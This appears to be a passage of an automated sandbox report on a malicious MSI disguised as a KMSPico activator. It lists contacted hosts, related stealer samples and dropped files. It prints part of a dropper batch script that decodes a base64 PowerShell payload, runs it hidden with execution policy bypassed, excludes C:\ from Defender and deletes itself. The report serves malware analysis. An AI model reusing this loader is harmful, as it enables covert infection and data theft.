https://ogs.goog	chrome.exe, 00000025.00000002.2471947043.00006F70000FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5371	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=bop	chrome.exe, 00000025.00000002.2477701472.00006F7000994000.00000004.00000800.00020000.00000000.sdmp	false		high
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000025.00000002.2472515709.00006F70001C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 00000025.00000002.2497484927.00006F7000D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2476421076.00006F7000784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2474879806.00006F7000508000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000011.00000002.1651044303.0000022DB1937000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7556	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0	Participating.com, 00000020.00000003.2174800196.00000000011F2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	chrome.exe, 00000025.00000002.2472137641.00006F700017C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://138.124.60.18	powershell.exe, 00000011.00000002.1651044303.0000022DB26AF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://138.124.60.8	powershell.exe, 00000011.00000002.1651044303.0000022DB26AF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://clients4.google.com/chrome-sync	chrome.exe, 00000025.00000002.2472515709.00006F70001C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000025.00000002.2498116516.00006F7000E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2423445169.00006F700140C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sedone.online	Participating.com, 00000020.00000002.2526328458.000000000433C000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 00000020.00000002.2529145325.0000000004C9C000.00000040.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/6692	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/258207403	chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2496522249.00006F7000C40000.00000004.00000800.00020000.00000000.sdmp	false		high
http://138.8	powershell.exe, 00000011.00000002.1651044303.0000022DB26AF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/3502	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2496522249.00006F7000C40000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sedone.online/bQ	Participating.com, 00000020.00000002.2526328458.000000000433C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://anglebug.com/3625	chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2496522249.00006F7000C40000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3624	chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2496522249.00006F7000C40000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/J	chrome.exe, 00000025.00000002.2476091798.00006F7000741000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5007	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/drive/installwebapp?usp=chrome_default	chrome.exe, 00000025.00000002.2476091798.00006F7000741000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2474305561.00006F7000394000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3862	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
http://138.124.60.138	powershell.exe, 00000011.00000002.1651044303.0000022DB26AF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000025.00000003.2391669625.00006F7000E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2389079648.00006F7000CC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2389461249.00006F7000E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2392806531.00006F7000E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2474634165.00006F700044B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2396752692.00006F7000CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2389652466.00006F7000448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2394523749.00006F7000E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2394350022.00006F700033C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/search?q=&addon=opensearch	chrome.exe, 00000025.00000002.2490806644.00006F7000C0C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4836	chrome.exe, 00000025.00000003.2388577635.00006F7000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388616104.00006F70007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2486893706.00006F7000BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	chrome.exe, 00000025.00000003.2388112654.00006F7000380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.ico	chrome.exe, 00000025.00000002.2496522249.00006F7000C40000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.19.228	www.google.com	United States	15169	GOOGLEUS	false
116.203.12.114	sedone.online	Germany	24940	HETZNER-ASDE	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
138.124.60.133	unknown	Norway	8983	NOKIA-ASFI	false

Private

IP
192.168.2.7
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576516
Start date and time:	2024-12-17 08:20:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	69633f.msi
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winMSI@59/75@7/7
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 94% Number of executed functions: 38 Number of non-executed functions: 183
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 217.20.58.98, 2.16.164.97, 2.16.164.105, 172.217.21.35, 172.217.19.206, 64.233.164.84, 172.217.17.46, 172.217.17.67, 23.218.208.109, 204.79.197.203, 204.79.197.239, 13.107.21.239, 13.107.6.158, 13.107.42.16, 13.107.246.63, 20.12.23.50
Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, clientservices.googleapis.com, time.windows.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, clients2.google.com, redirector.gvt1.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, www.gstatic.com, prod.fs.microsoft.com.akadns.net, l-0007.l-msedge.net, wu-b-net.trafficmanager.net, config.edge.skype.com, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, accounts.google.com, bingadsedgeextension-prod.trafficmanager.net, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, api.edgeoffer.microsoft.com, a-0003.a-msedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, b-0005.b-msedge.net, edge.microsoft.com, business-bing-com.b-0005.b-msedge.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, l-0007.config.skype.com, business.bing
Execution Graph export aborted for target powershell.exe, PID 7796 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 69633f.msi

Simulations

Behavior and APIs

Time	Type	Description
02:21:10	API Interceptor	1x Sleep call for process: msiexec.exe modified
02:21:29	API Interceptor	38x Sleep call for process: powershell.exe modified
03:50:53	API Interceptor	1x Sleep call for process: putt.exe modified
03:51:04	API Interceptor	15x Sleep call for process: Participating.com modified
03:52:06	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	https://essind.freshdesk.com/en/support/solutions/articles/157000010576-pedido-553268637	Get hash	malicious	Unknown	Browse
	https://zendesk.secure-sso.org/qrCXJSuc	Get hash	malicious	Unknown	Browse
	https://solve.jenj.org/awjxs.captcha?u=001e7d38-a1fc-47e3-ac88-6df0872bfe2d	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse
	https://uvcr.ovactanag.ru/jQXv/	Get hash	malicious	Unknown	Browse
	https://bgf43.bookrecce.com/vfd23ced/#sean@virtualintelligencebriefing.com	Get hash	malicious	Unknown	Browse
	https://mailustabucaedu-my.sharepoint.com/:u:/g/personal/stella_pabon_ustabuca_edu_co/EWCk8BqICKBBrExz32n-PvYBCVoLK4PToNCGKPT0vElGYg?e=w0tQWE	Get hash	malicious	Unknown	Browse
	https://mailustabucaedu-my.sharepoint.com/:u:/g/personal/stella_pabon_ustabuca_edu_co/EWCk8BqICKBBrExz32n-PvYBCVoLK4PToNCGKPT0vElGYg?e=w0tQWE	Get hash	malicious	Unknown	Browse
	https://tinyurl.com/cueen04fmfsf	Get hash	malicious	Unknown	Browse
	https://dot.itsecuritymessages.com/45sf4657dvz4hn/afc6c7/00179cbf-581d-4c00-98d3-bf1104b204ad	Get hash	malicious	Unknown	Browse
116.203.12.114	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	149.154.167.99
	njrtdhadawt.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, Vidar, Xmrig	Browse	149.154.167.99
	https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baa	Get hash	malicious	Unknown	Browse	104.26.10.61
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	149.154.167.99
	lem.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Setup.msi	Get hash	malicious	Vidar	Browse	149.154.167.99
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	cey4VIyGKh.lnk	Get hash	malicious	RHADAMANTHYS	Browse	94.245.104.56
	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse	94.245.104.56
	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	94.245.104.56
bg.microsoft.map.fastly.net	fsg5PWtTm2.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	199.232.210.172
	SkaKk8Z1J0.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
	#U041e#U043f#U043b#U0430#U0442#U0430.xls	Get hash	malicious	Unknown	Browse	199.232.210.172
	Client-built.exe	Get hash	malicious	Quasar	Browse	199.232.210.172
	wayneenterprisesbatcave-6.0.1901-windows-installer.msi	Get hash	malicious	ScreenConnect Tool	Browse	199.232.214.172
	Untitled-1.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	199.232.210.172
	new.bat	Get hash	malicious	Unknown	Browse	199.232.214.172
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	199.232.214.172
	BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xls	Get hash	malicious	Unknown	Browse	199.232.214.172
	Sample_Order_000000991.xls	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	l9IH82eiKw.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	QUOTATION REQUEST - BQS058.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
HETZNER-ASDE	236236236.elf	Get hash	malicious	Unknown	Browse	176.9.89.11
	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse	116.203.12.114
	download.ps1	Get hash	malicious	Unknown	Browse	188.40.187.161
	download.ps1	Get hash	malicious	Unknown	Browse	188.40.187.161
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	116.203.12.114
	download.ps1	Get hash	malicious	Unknown	Browse	188.40.187.161
	download.ps1	Get hash	malicious	Unknown	Browse	188.40.187.161
	ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	159.69.249.103
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	116.203.12.114
	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse	116.203.12.114
NOKIA-ASFI	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	138.124.35.95
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	138.124.35.95
	YPgggL1oh7.exe	Get hash	malicious	Unknown	Browse	138.124.34.218
	rCKCW2iScd.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	138.124.34.218
	Z7JB7gZrXF.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	138.124.34.218
	46pPLyw8sN.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	138.124.34.218
	TRC.mips.elf	Get hash	malicious	Mirai	Browse	135.22.198.120
	elitebotnet.m68k.elf	Get hash	malicious	Mirai, Okiru	Browse	135.238.199.135
	rebirth.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	135.22.198.133
	jew.arm6.elf	Get hash	malicious	Unknown	Browse	138.124.119.11

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	116.203.12.114 149.154.167.99
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	116.203.12.114 149.154.167.99
	fsg5PWtTm2.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	116.203.12.114 149.154.167.99
	1iC0WTxgUf.exe	Get hash	malicious	Unknown	Browse	116.203.12.114 149.154.167.99
	Instruction_695-18112-002_Rev.PDF.lnk.d.lnk	Get hash	malicious	Unknown	Browse	116.203.12.114 149.154.167.99
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	116.203.12.114 149.154.167.99
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig	Browse	116.203.12.114 149.154.167.99
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	116.203.12.114 149.154.167.99
	ME-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	116.203.12.114 149.154.167.99
	09-FD-94.03.60.175.07.xlsx.exe	Get hash	malicious	GuLoader	Browse	116.203.12.114 149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\615578\Participating.com	fm2r286nqT.exe	Get hash	malicious	LummaC	Browse
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse
	lem.exe	Get hash	malicious	Vidar	Browse
	Setup.msi	Get hash	malicious	Vidar	Browse
	SET_UP.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	SET_UP.exe	Get hash	malicious	LummaC Stealer	Browse
	Set-Up.exe	Get hash	malicious	LummaC Stealer	Browse
	OR8Ti8rf8h.exe	Get hash	malicious	AveMaria, DcRat, StormKitty, VenomRAT	Browse

Created / dropped Files

C:\Config.Msi\53c169.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	557648
Entropy (8bit):	6.439352537000821
Encrypted:	false
SSDEEP:	12288:tllcFz7UKez1EtOgU7Y4p4nle/DGWG5aQ:tyz7UcU7Y4p4KGLF
MD5:	E275AE10342B0D45E6722BB2A99F6447
SHA1:	9A0A621E9F46DA6DC3019949F26AB33ADA41859A
SHA-256:	9B737567BC2773DABF1CA515C7AE85FC02FA6622184B44251A6AE94F3E77F523
SHA-512:	C27E948FBA5A5C4E3005FF05B2CD1530297144F3C391953DF4BFA239C86BBA70DE740B91E617D3082E8F3CCBDA56374E1AA89860EF8A13F343694CE6D7AEA71C
Malicious:	false
Preview:	...@IXOS.@.....@...Y.@.....@.....@.....@.....@.....@......&.{8549544C-E110-43F1-890F-41A5D528F5AA}..KmsPicoAuto..69633f.msi.@.....@.....@.....@........&.{01A028B0-C5F4-4809-A85C-BD25D6968735}.....@.....@.....@.....@.......@.....@.....@.......@......KmsPicoAuto......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{54726178-C674-486D-854B-BD331D9F11FB}&.{8549544C-E110-43F1-890F-41A5D528F5AA}.@......&.{DE68DB34-02FE-4559-86D1-5AB24521AE4D}&.{8549544C-E110-43F1-890F-41A5D528F5AA}.@......&.{1123B093-4171-4C7B-A7CC-3322A7CCA975}&.{8549544C-E110-43F1-890F-41A5D528F5AA}.@......&.{05BD4742-3BAA-4DFE-8690-598F6240A7B3}&.{8549544C-E110-43F1-890F-41A5D528F5AA}.@......&.{590CC74D-37DE-4058-AF20-60F01E547330}&.{8549544C-E110-43F1-890F-41A5D528F5AA}.@......&.{D023D91C-307F-4BDB-82A8-0CF44BC35857}&.{8549544C-E110-43F1-890F-41A5D528F5AA}.@........CreateFolders..Creating folders..Folder: [1]#.0.C:\Program Files

C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (2360), with CRLF line terminators
Category:	dropped
Size (bytes):	3026
Entropy (8bit):	5.927391302608103
Encrypted:	false
SSDEEP:	48:RX8ygv7n8hOG3tIP3/60ou073+SKY1HjXySKxW+J/tqb4si:F8Vj85tIPvPf0Lr1HzC/BT
MD5:	60854EA13B33D56B1F39375D0E75F999
SHA1:	9B0CF0ADE1F13670C7803A376E2CEA607C2C6E2E
SHA-256:	D7063678AC3EA2F58B085D76626657B02D89A0129089AD9FA1EF1A504CB6C05F
SHA-512:	3D5F2B71ED187B22C368B2AD12840D7D76A0989E38630C2828EAD0B2114B932AE20458F6C13E780413E869805D3151A648DC5DF008130E4F20013B15E80867E6
Malicious:	true
Preview:	@echo off >nul..setlocal enabledelayedexpansion....set /a i=0..set "name=%temp%\%random%.ps1"....for /f "tokens=*" %%A in (%~n0.bat) do (.. set /a i+=1.. if !i! gtr 13 (.. set "line=%%A".. echo !line!>>%name%.. )..)..certutil -decode -f %name% %name%....:: ...... PowerShell . ....... ........echo Set objShell = CreateObject("WScript.Shell") > "%temp%\runner.vbs"..echo objShell.Run "powershell.exe -ExecutionPolicy Bypass -File ""%name%""", 0, False >> "%temp%\runner.vbs"..cscript.exe //nologo "%temp%\runner.vbs"....del /F %temp%\runner.vbs..del /F %0..exit....-----BEGIN CERTIFICATE-----..IyDQn9GB0LXQstC00L7QvdC40LzRiyDQuCDQvtCx0YTRg9GB0LrQsNGG0LjRjwokYWxpYXMgPSAiSUVYIgokY21kID0gJ0FkZC1NcFByZWZlcmVuY2UgLUV4Y2x1c2lvblBhdGggIkM6XCInCgojINCS0YvQv9C+0LvQvdC10L3QuNC1INC60L7QvNCw0L3QtNGLCiYgJGFsaWFzICRjbWQKCiMg0JfQsNC00LXRgNC20LrQsCAxNSDRgdC10LrRg9C90LQKU3RhcnQtU2xlZXAgLVNlY29uZHMgMTAKCiMg0J/QtdGA0LXQvNC10L3QvdGL0LUg0YEg0L7QsdGE0YPRgdGG0LjRgNC+0LLQsNC

C:\ProgramData\3790H479RI5F\B1NOPH

Download File

Process:	C:\Users\user\AppData\Local\Temp\615578\Participating.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\3790H479RI5F\U37QQIEKN

Download File

Process:	C:\Users\user\AppData\Local\Temp\615578\Participating.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
